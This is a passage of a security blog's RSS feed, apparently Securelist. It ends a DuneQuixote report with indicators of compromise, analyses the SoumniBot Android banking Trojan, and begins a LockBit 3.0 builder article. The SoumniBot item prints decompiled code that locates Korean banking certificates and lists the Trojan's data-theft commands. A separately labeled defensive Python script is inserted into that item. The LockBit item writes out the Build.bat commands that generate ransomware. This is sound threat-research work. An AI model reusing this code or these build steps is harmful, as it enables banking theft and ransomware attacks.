  561. <td>userfeedsync[.]com</td>
  562. <td>104.36.229[.]249</td>
  563. <td>2024-01-10 07:27</td>
  564. <td>395092</td>
  565. </tr>
  566. </tbody>
  567. </table>
  568. <h2 id="victims">Victims</h2>
569. <p>We discovered victims in the Middle East, as per our telemetry, as early as February 2023. Additionally, there were several uploads to a semi-public malware scanning service at a later stage, more specifically starting on December 12, 2023, with more than 30 submissions of the droppers in the period up to the end of January 2024. The majority of these uploads also originated from the Middle East. Other sources, which we suspect to be VPN exit nodes, were geolocated in South Korea, Luxembourg, Japan, Canada, the Netherlands and the US.</p>
  570. <h2 id="conclusions">Conclusions</h2>
  571. <p>The &#8220;DuneQuixote&#8221; campaign targets entities in the Middle East with an interesting array of tools designed for stealth and persistence. Through the deployment of memory-only implants and droppers masquerading as legitimate software, mimicking the Total Commander installer, the attackers demonstrate above average evasion capabilities and techniques. The discovery of both C/C++ and Golang versions of the CR4T implant highlights the adaptability and resourcefulness of the threat actors behind this campaign.</p>
  572. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  573. <p><strong>DuneQuixote Droppers</strong><br />
  609. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">fb2b916e44abddd943015787f6a8dc35</a><br />
  610. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
  611. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f29f977e786b2f7f483b47840b9c19d</a><br />
  612. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
  613. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
  614. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
  615. <p><strong>Domains and IPs </strong><br />
  616. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Commonline[.]space </a><br />
  617. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
  618. <a href=";utm_medium=SL&#038;utm_campaign=SLtarget="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
  619. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
  620. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
  621. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
  622. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
  623. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Service.userfeedsync[.]com</a><br />
  624. <a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
  625. ]]></content:encoded>
  626. <wfw:commentRss></wfw:commentRss>
  627. <slash:comments>0</slash:comments>
  628. <media:content xmlns:media="" url="" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
  629. <media:content xmlns:media="" url="" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  630. <media:content xmlns:media="" url="" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
  631. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  632. </item>
  633. <item>
  634. <title>SoumniBot: the new Android banker&#8217;s unique techniques</title>
  635. <link></link>
  636. <comments></comments>
  637. <dc:creator><![CDATA[Dmitry Kalinin]]></dc:creator>
  638. <pubDate>Wed, 17 Apr 2024 10:00:28 +0000</pubDate>
  639. <category><![CDATA[Malware descriptions]]></category>
  640. <category><![CDATA[Google Android]]></category>
  641. <category><![CDATA[Malware]]></category>
  642. <category><![CDATA[Malware Descriptions]]></category>
  643. <category><![CDATA[Malware Technologies]]></category>
  644. <category><![CDATA[Mobile Malware]]></category>
  645. <category><![CDATA[Trojan]]></category>
  646. <category><![CDATA[Trojan Banker]]></category>
  647. <category><![CDATA[Financial threats]]></category>
  648. <category><![CDATA[Mobile threats]]></category>
  649. <guid isPermaLink="false"></guid>
  651. <description><![CDATA[We review the new mobile Trojan banker SoumniBot, which exploits bugs in the Android manifest parser to dodge analysis and detection.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. For example, droppers such as Badpack and Hqwar, designed to stealthily deliver Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. We recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection: obfuscation of the Android manifest.</p>
  653. <h2 id="soumnibot-obfuscation-exploiting-bugs-in-the-android-manifest-extraction-and-parsing-procedure">SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure</h2>
<p>Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system locate the various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should begin. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest extraction and parsing routine, where they found several interesting opportunities to obfuscate APKs.</p>
  655. <h3 id="technique-1-invalid-compression-method-value">Technique 1: Invalid Compression method value</h3>
<p>This is a <a href="" target="_blank" rel="noopener">relatively well-known technique</a> used by various types of malware, including SoumniBot, and it exploits the way manifests are unpacked. In the <em>libziparchive</em> library, the standard unarchiving function permits only two <em>Compression method</em> values in the record header: 0x0000 (STORED, that is, uncompressed) and 0x0008 (DEFLATED, that is, compressed with <em>deflate</em> from the <em>zlib</em> library); any other value results in an error.</p>
  657. <div id="attachment_112415" style="width: 749px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112415" src="" alt="libziparchive unarchiving algorithm" width="739" height="498" class="size-full wp-image-112415" srcset=" 739w, 300w, 519w, 416w" sizes="(max-width: 739px) 100vw, 739px" /></a><p id="caption-attachment-112415" class="wp-caption-text">libziparchive unarchiving algorithm</p></div>
  658. <p>Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the <em>Compression method</em> field is validated incorrectly.</p>
  659. <div id="attachment_112416" style="width: 761px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112416" src="" alt="Manifest extraction procedure" width="751" height="693" class="size-full wp-image-112416" srcset=" 751w, 300w, 379w, 740w, 303w" sizes="(max-width: 751px) 100vw, 751px" /></a><p id="caption-attachment-112416" class="wp-caption-text">Manifest extraction procedure</p></div>
  660. <p>If the APK parser comes across any <em>Compression method</em> value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into <em>Compression method</em> and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a>.</p>
  661. <div id="attachment_112417" style="width: 630px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112417" src="" alt="Invalid Compression method value followed by uncompressed data" width="620" height="617" class="size-full wp-image-112417" srcset=" 620w, 300w, 150w, 352w, 281w, 50w" sizes="(max-width: 620px) 100vw, 620px" /></a><p id="caption-attachment-112417" class="wp-caption-text">Invalid Compression method value followed by uncompressed data</p></div>
  662. <h3 id="technique-2-invalid-manifest-size">Technique 2: Invalid manifest size</h3>
<p>Let&#8217;s use the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a> as an example to review the essence of this technique. The header of the AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it is copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is, data following the payload that is unrelated to the manifest. The malware takes advantage of this: the manifest size stated in the header exceeds the actual size, which results in an overlay, with part of the archive content being appended to the unpacked manifest. Stricter manifest parsers would not be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.</p>
  664. <div id="attachment_112418" style="width: 617px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112418" src="" alt="The stated size of the manifest is much larger than its actual size" width="607" height="482" class="size-full wp-image-112418" srcset=" 607w, 300w, 441w, 353w" sizes="(max-width: 607px) 100vw, 607px" /></a><p id="caption-attachment-112418" class="wp-caption-text">The stated size of the manifest is much larger than its actual size</p></div>
  665. <p>Note that although live devices interpret these files as valid, <a href="" target="_blank" rel="noopener">apkanalyzer</a>, Google&#8217;s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.</p>
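<p>As an added example (not code from the Securelist article or from the SoumniBot sample), the following Python script shows how a defender-side APK triage check can flag the two header tricks just described: a <em>Compression method</em> on the AndroidManifest.xml entry outside the two values a strict unpacker accepts, and a stated manifest size that overruns the entry&#8217;s real payload into the following archive records. Because the standard <em>zipfile</em> module refuses to write an unknown compression method, the script hand-builds two constructed ZIP archives, one benign and one carrying both tricks, and audits the manifest entry of each. Entry names, sizes and payload bytes are constructed test data; the Android binary XML format itself is not modelled.</p>

```python
# Added example: defender-side check for the two AndroidManifest.xml header tricks
# described above. All archive contents below are constructed test data.

LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"
STORED, DEFLATED = 0x0000, 0x0008


def u16(b, off):
    return int.from_bytes(b[off:off + 2], "little")


def u32(b, off):
    return int.from_bytes(b[off:off + 4], "little")


def le(value, width):
    return value.to_bytes(width, "little")


def build_zip(entries):
    """Hand-rolled ZIP writer for constructed test data (zipfile refuses to
    write unknown compression methods). entries: (name, method, data, stated_size)."""
    body, central = bytearray(), bytearray()
    for name, method, data, stated_size in entries:
        name_b, offset = name.encode(), len(body)
        # local header: version, flags, method, time/date, crc, csize, usize, nlen, xlen
        body += LOCAL_SIG + le(20, 2) + le(0, 2) + le(method, 2) + le(0, 4) + le(0, 4)
        body += le(stated_size, 4) * 2 + le(len(name_b), 2) + le(0, 2) + name_b + data
        # central header: same fields plus xlen/clen/disk/attrs and the local header offset
        central += CENTRAL_SIG + le(20, 2) * 2 + le(0, 2) + le(method, 2) + le(0, 4) + le(0, 4)
        central += le(stated_size, 4) * 2 + le(len(name_b), 2) + le(0, 2) * 4 + le(0, 4)
        central += le(offset, 4) + name_b
    cd_offset = len(body)
    body += central + EOCD_SIG + le(0, 2) * 2 + le(len(entries), 2) * 2
    body += le(len(central), 4) + le(cd_offset, 4) + le(0, 2)
    return bytes(body)


def read_central_directory(blob):
    """Return (cd_offset, entries), locating the central directory via the EOCD record."""
    eocd = blob.rfind(EOCD_SIG)
    if eocd == -1:
        raise ValueError("no end-of-central-directory record")
    count, cd_offset = u16(blob, eocd + 10), u32(blob, eocd + 16)
    pos, entries = cd_offset, []
    for _ in range(count):
        if blob[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("corrupt central directory")
        nlen, xlen, clen = u16(blob, pos + 28), u16(blob, pos + 30), u16(blob, pos + 32)
        entries.append({
            "name": blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace"),
            "method": u16(blob, pos + 10),
            "csize": u32(blob, pos + 20),
            "local_offset": u32(blob, pos + 42),
        })
        pos += 46 + nlen + xlen + clen
    return cd_offset, entries


def audit_manifest(blob, manifest_name="AndroidManifest.xml"):
    """Flag the two tricks for the manifest entry: a Compression method that a strict
    unpacker rejects (Android treats the data as STORED), and a stated size that runs
    past the real payload into the following archive records."""
    cd_offset, entries = read_central_directory(blob)
    findings = []
    manifest = [e for e in entries if e["name"] == manifest_name]
    if not manifest:
        return ["no AndroidManifest.xml entry"]
    entry = manifest[0]
    if entry["method"] not in (STORED, DEFLATED):
        findings.append(f"invalid Compression method 0x{entry['method']:04x}: strict unpackers "
                        "reject it, Android treats the data as uncompressed")
    loc = entry["local_offset"]
    if blob[loc:loc + 4] != LOCAL_SIG:
        return findings + ["central directory points at no local file header"]
    data_start = loc + 30 + u16(blob, loc + 26) + u16(blob, loc + 28)
    # the real payload cannot extend past the next local header or the central directory
    later = [e["local_offset"] for e in entries if e["local_offset"] > loc]
    available = min(later + [cd_offset]) - data_start
    stated = entry["csize"]
    if stated > available:
        findings.append(f"stated size {stated} exceeds the {available} bytes actually "
                        "available: the overlay swallows following archive data")
    if LOCAL_SIG in blob[data_start:data_start + stated]:
        findings.append("manifest payload region contains another local file header")
    return findings


def demo():
    """Audit a benign constructed APK-like archive and one carrying both tricks."""
    manifest = b"constructed-manifest-bytes-not-real-AXML"
    dex = b"dex\n035\x00" + b"\x00" * 16
    benign = build_zip([("AndroidManifest.xml", STORED, manifest, len(manifest)),
                        ("classes.dex", STORED, dex, len(dex))])
    tricky = build_zip([("AndroidManifest.xml", 0x0003, manifest, len(manifest) + 40),
                        ("classes.dex", STORED, dex, len(dex))])
    return audit_manifest(benign), audit_manifest(tricky)


if __name__ == "__main__":
    clean, flagged = demo()
    print("benign:", clean or "no findings")
    for finding in flagged:
        print("tricky:", finding)
```

<p>The audit reads the central directory the way the Android unpacker does and then cross-checks it against the local header, so a manifest that a live device installs without complaint but that a strict tool rejects surfaces as two distinct findings rather than a generic parse error. In the constructed sample the benign archive yields no findings, while the one with method 0x0003 and an inflated size yields three.</p>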
  666. <h3 id="technique-3-long-namespace-names">Technique 3: Long namespace names</h3>
  667. <p>The SoumniBot malware family, for example the file <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a>, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.</p>
  668. <div id="attachment_112419" style="width: 1240px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112419" src="" alt="Very long strings in the manifest…" width="1230" height="864" class="size-full wp-image-112419" srcset=" 1230w, 300w, 1024w, 768w, 498w, 740w, 399w, 800w" sizes="(max-width: 1230px) 100vw, 1230px" /></a><p id="caption-attachment-112419" class="wp-caption-text">Very long strings in the manifest…</p></div>
  669. <div id="attachment_112420" style="width: 518px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112420" src="" alt="…used as namespace names" width="508" height="69" class="size-full wp-image-112420" srcset=" 508w, 300w, 500w" sizes="(max-width: 508px) 100vw, 508px" /></a><p id="caption-attachment-112420" class="wp-caption-text">…used as namespace names</p></div>
<p>Manifests that contain strings like these become unreadable for both humans and programs, and the latter may not be able to allocate enough memory to process them. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.</p>
  671. <h2 id="whats-under-the-obfuscation-soumnibots-functionality">What&#8217;s under the obfuscation: SoumniBot&#8217;s functionality</h2>
<p>When started, the application requests a configuration with two parameters, mainsite and mqtt, from a server whose address is a hardcoded constant.</p>
  673. <div id="attachment_112421" style="width: 459px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112421" src="" alt="Parameter request" width="449" height="266" class="size-full wp-image-112421" srcset=" 449w, 300w" sizes="(max-width: 449px) 100vw, 449px" /></a><p id="caption-attachment-112421" class="wp-caption-text">Parameter request</p></div>
  674. <p>Both parameters are server addresses, which the malware needs for proper functioning. The mainsite server receives collected data, and mqtt provides MQTT messaging functionality for receiving commands. If the source server did not provide these parameters for some reason, the application will use the default addresses, also stored in the code.</p>
  675. <p>After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim&#8217;s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim&#8217;s ID generated with the help of the <a href="" target="_blank" rel="noopener">trustdevice-android</a> library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.</p>
  676. <table width="100%">
  677. <tbody>
  678. <tr>
  679. <td style="text-align: center" width="10%"><strong>#</strong></td>
  680. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  681. <td style="text-align: center" width="40%"><strong>Parameters</strong></td>
  682. </tr>
  683. <tr>
  684. <td style="text-align: center">0</td>
  685. <td>Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim&#8217;s SMS messages, contacts, accounts, photos, videos and online banking digital certificates.</td>
  686. <td>&#8211;</td>
  687. </tr>
  688. <tr>
  689. <td style="text-align: center">1</td>
  690. <td>Sends the victim&#8217;s contact list.</td>
  691. <td>&#8211;</td>
  692. </tr>
  693. <tr>
  694. <td style="text-align: center">2</td>
  695. <td>Deletes a contact on the victim&#8217;s device.</td>
  696. <td><em>data</em>: the name of the contact to delete</td>
  697. </tr>
  698. <tr>
  699. <td style="text-align: center">3</td>
  700. <td>Sends the victim&#8217;s SMS and MMS messages.</td>
  701. <td>&#8211;</td>
  702. </tr>
  703. <tr>
  704. <td style="text-align: center">4</td>
  705. <td>A debugging command likely to be replaced with sending call logs in a new version.</td>
  706. <td>&#8211;</td>
  707. </tr>
  708. <tr>
  709. <td style="text-align: center">5</td>
  710. <td>Sends the victim&#8217;s photos and videos.</td>
  711. <td>&#8211;</td>
  712. </tr>
  713. <tr>
  714. <td style="text-align: center">8</td>
  715. <td>Sends an SMS message.</td>
  716. <td><em>data</em>: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.</td>
  717. </tr>
  718. <tr>
  719. <td style="text-align: center">24</td>
  720. <td>Sends a list of installed apps.</td>
  721. <td>&#8211;</td>
  722. </tr>
  723. <tr>
  724. <td style="text-align: center">30</td>
  725. <td>Adds a new contact on the device.</td>
  726. <td><em>name</em>: contact name; <em>phoneNum</em>: phone number</td>
  727. </tr>
  728. <tr>
  729. <td style="text-align: center">41</td>
  730. <td>Gets ringtone volume levels.</td>
  731. <td>&#8211;</td>
  732. </tr>
  733. <tr>
  734. <td style="text-align: center">42</td>
  735. <td>Turns silent mode on or off.</td>
  736. <td><em>data</em>: a flag set to 1 to turn on silent mode and to 0 to turn it off</td>
  737. </tr>
  738. <tr>
  739. <td style="text-align: center">99</td>
  740. <td>Sends a <em>pong</em> message in response to an MQTT ping request.</td>
  741. <td>&#8211;</td>
  742. </tr>
  743. <tr>
  744. <td style="text-align: center">100</td>
  745. <td>Turns on debug mode.</td>
  746. <td>&#8211;</td>
  747. </tr>
  748. <tr>
  749. <td style="text-align: center">101</td>
  750. <td>Turns off debug mode.</td>
  751. <td>&#8211;</td>
  752. </tr>
  753. </tbody>
  754. </table>
<p>The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files that contain paths to /NPKI/yessign.</p><pre class="crayon-plain-tag">// Decompiled SoumniBot routine; uses android.content.Context, android.database.Cursor,
// android.provider.MediaStore and java.util.{List, ArrayList}. Logger is the Trojan's own class.
public static List&lt;String&gt; getAllBankingKeys(Context context) {
    List&lt;String&gt; list = new ArrayList&lt;&gt;();
    // Query the MediaStore index of external storage for files ending in .key or .der
    Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
            new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
            "(_data LIKE '%.key' OR _data LIKE '%.der')", null, null);
    int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
    if (cursor != null) {
        while (cursor.moveToNext()) {
            String s = cursor.getString(index);
            // Only paths under the Korean NPKI certificate store are of interest
            if (!s.contains("/NPKI/yessign")) {
                continue;
            }
            Logger.log("path is:" + s);
            list.add(s);
            break; // the first matching path is enough: its directory is archived later
        }
        cursor.close();
    }
    return list;
}</pre><p>
If the application finds files like that, it copies the directory where they are located into a ZIP archive and sends it to the C&#038;C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions. This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its sophisticated obfuscation techniques, and assign to it the verdict of Trojan-Banker.AndroidOS.SoumniBot.</p>
  776. <h2 id="conclusion">Conclusion</h2>
  777. <p>Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded due to insufficiently strict validations in the Android manifest parser code.</p>
  778. <p>We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims&#8217; wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.</p>
  779. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  780. <p><strong>MD5</strong><br />
  781. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a><br />
  782. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00aa9900205771b8c9e7927153b77cf2</a><br />
  783. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a><br />
  784. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a></p>
  785. <p><strong>C&amp;C</strong><br />
  786. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]google.kt9[.]site</a><br />
  787. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]dbdb.addea.workers[.]dev</a></p>
  788. ]]></content:encoded>
  789. <wfw:commentRss></wfw:commentRss>
  790. <slash:comments>0</slash:comments>
  791. <media:content xmlns:media="" url="" width="1885" height="1060"><media:keywords>full</media:keywords></media:content>
  792. <media:content xmlns:media="" url="" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  793. <media:content xmlns:media="" url="" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  794. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  795. </item>
  796. <item>
  797. <title>Using the LockBit builder to generate targeted ransomware</title>
  798. <link></link>
  799. <comments></comments>
  800. <dc:creator><![CDATA[Eduardo Ovalle, Francesco Figurelli, Cristian Souza, Ashley Muñoz]]></dc:creator>
  801. <pubDate>Mon, 15 Apr 2024 10:00:28 +0000</pubDate>
  802. <category><![CDATA[Malware descriptions]]></category>
  803. <category><![CDATA[Data Encryption]]></category>
  804. <category><![CDATA[Incident response]]></category>
  805. <category><![CDATA[LockBit]]></category>
  806. <category><![CDATA[Malware]]></category>
  807. <category><![CDATA[Malware Technologies]]></category>
  808. <category><![CDATA[Ransomware]]></category>
  809. <category><![CDATA[Targeted attacks]]></category>
  810. <category><![CDATA[Trojan]]></category>
  811. <category><![CDATA[APT (Targeted attacks)]]></category>
  812. <category><![CDATA[Windows malware]]></category>
  813. <guid isPermaLink="false"></guid>
  815. <description><![CDATA[Kaspersky researchers revisit the leaked LockBit 3.0 builder and share insights into a real-life incident involving a custom targeted ransomware variant created with this builder.]]></description>
  816. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The previous Kaspersky <a href="" target="_blank" rel="noopener">research</a> focused on a detailed analysis of the LockBit 3.0 builder leaked in 2022. Since then, attackers have been able to generate customized versions of the threat according to their needs. This opens up numerous possibilities for malicious actors to make their attacks more effective, since it is possible to configure network spread options and defense-killing functionality. It becomes even more dangerous if the attacker has valid privileged credentials in the target infrastructure.</p>
  817. <p>In a recent incident response engagement, we faced this exact scenario: the adversary was able to get the administrator credential in plain text. They generated a custom version of the ransomware, which used the aforementioned account credential to spread across the network and perform malicious activities, such as killing Windows Defender and erasing Windows Event Logs in order to encrypt the data and cover its tracks.</p>
  818. <p>In this article, we revisit the LockBit 3.0 builder files and delve into the adversary&#8217;s steps to maximize impact on the network. In addition, we provide a list of preventive activities that can help network administrators to avoid this kind of threat.</p>
  819. <h2 id="revisiting-the-lockbit-3-0-builder-files">Revisiting the LockBit 3.0 builder files</h2>
  820. <p>The LockBit 3.0 builder has significantly simplified creating customized ransomware. The image below shows the files that constitute it. As we can see, <strong>keygen.exe</strong> generates public and private keys used for encryption and decryption. After that, <strong>builder.exe</strong> generates the variant according to the options set in the <strong>config.json</strong> file.</p>
  821. <div id="attachment_112388" style="width: 930px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112388" class="size-full wp-image-112388" src="" alt="LockBit builder files" width="920" height="393" srcset=" 920w, 300w, 768w, 819w, 740w, 655w, 800w" sizes="(max-width: 920px) 100vw, 920px" /></a><p id="caption-attachment-112388" class="wp-caption-text">LockBit builder files</p></div>
  822. <p>This whole process is automated with the <strong>Build.bat</strong> script, which does the following:</p><pre class="crayon-plain-tag">IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build)
  823. keygen -path Build -pubkey pub.key -privkey priv.key
  824. builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe
  825. builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe
  826. builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe
  827. builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll
  828. builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll
  829. builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll</pre><p>
  830. The <strong>config.json</strong> file allows enabling impersonation features (<strong>impersonation</strong>) and defining accounts to impersonate (<strong>impers_accounts</strong>). In the example below, the administrator account was used for impersonation. The configuration also allows enabling the encryption of network shares (<strong>network_shares</strong>), killing Windows Defender (<strong>kill_defender</strong>), and spreading across the network via PsExec (<strong>psexec_netspread</strong>). After a successful infection, the malicious sample can delete Windows Event Logs (<strong>delete_eventlogs</strong>) to cover its tracks.</p>
  831. <div id="attachment_112389" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112389" class="size-large wp-image-112389" src="" alt="Custom configuration" width="1024" height="508" srcset=" 1024w, 300w, 768w, 706w, 740w, 565w, 800w, 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112389" class="wp-caption-text">Custom configuration</p></div>
  832. <p>Besides this, the builder allows the attacker to choose which files, in which directories, and in which systems they do not want to encrypt. If the attacker knows their way around the target infrastructure, they can generate malware tailored to the specific configuration of the target&#8217;s network architecture, such as important files, administrative accounts, and critical systems. The images below show the process of generating customized ransomware according to the above configuration, and the resulting files. As we can see, <strong>LB3.exe</strong> is the main file. This is the artifact that will be delivered to the victim. The builder also generates <strong>LB3Decryptor.exe</strong> for recovering the files, as well as several different variants of the main file. For example, <strong>LB3_pass.exe</strong> is a password-protected version of the ransomware, while the reflective DLL can be used to bypass the standard operating system loader and inject malware directly into memory. The TXT files contain instructions on how to execute the password-protected files.</p>
  833. <div id="attachment_112390" style="width: 640px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112390" class="size-full wp-image-112390" src="" alt="Creation of a customized LockBit version" width="630" height="148" srcset=" 630w, 300w" sizes="(max-width: 630px) 100vw, 630px" /></a><p id="caption-attachment-112390" class="wp-caption-text">Creation of a customized LockBit version</p></div>
  834. <div id="attachment_112391" style="width: 627px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112391" class="size-full wp-image-112391" src="" alt="Generated LockBit files" width="617" height="303" srcset=" 617w, 300w, 570w" sizes="(max-width: 617px) 100vw, 617px" /></a><p id="caption-attachment-112391" class="wp-caption-text">Generated LockBit files</p></div>
  835. <p>When we executed this custom build on a virtual machine, it performed its malicious activities and generated custom ransom note files. In real-life scenarios, the note will include details on how the victim should contact the attackers to obtain a decryptor. It is worth noting that negotiating with the attackers and paying ransom should not be an option. Besides the ethical issues involved, there is doubt whether a tool for recovering the files will ever be provided.</p>
  836. <div id="attachment_112392" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112392" class="size-large wp-image-112392" src="" alt="Custom ransom note" width="1024" height="695" srcset=" 1024w, 300w, 768w, 516w, 740w, 413w, 800w, 1135w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112392" class="wp-caption-text">Custom ransom note</p></div>
  837. <p>However, as we generated the ransomware sample and a corresponding decryptor ourselves in a controlled lab environment, we were able to test if the latter actually worked. We tried to decrypt our encrypted files and found out that if the decryptor for the sample was available, it was indeed able to recover the files, as shown in the image below.</p>
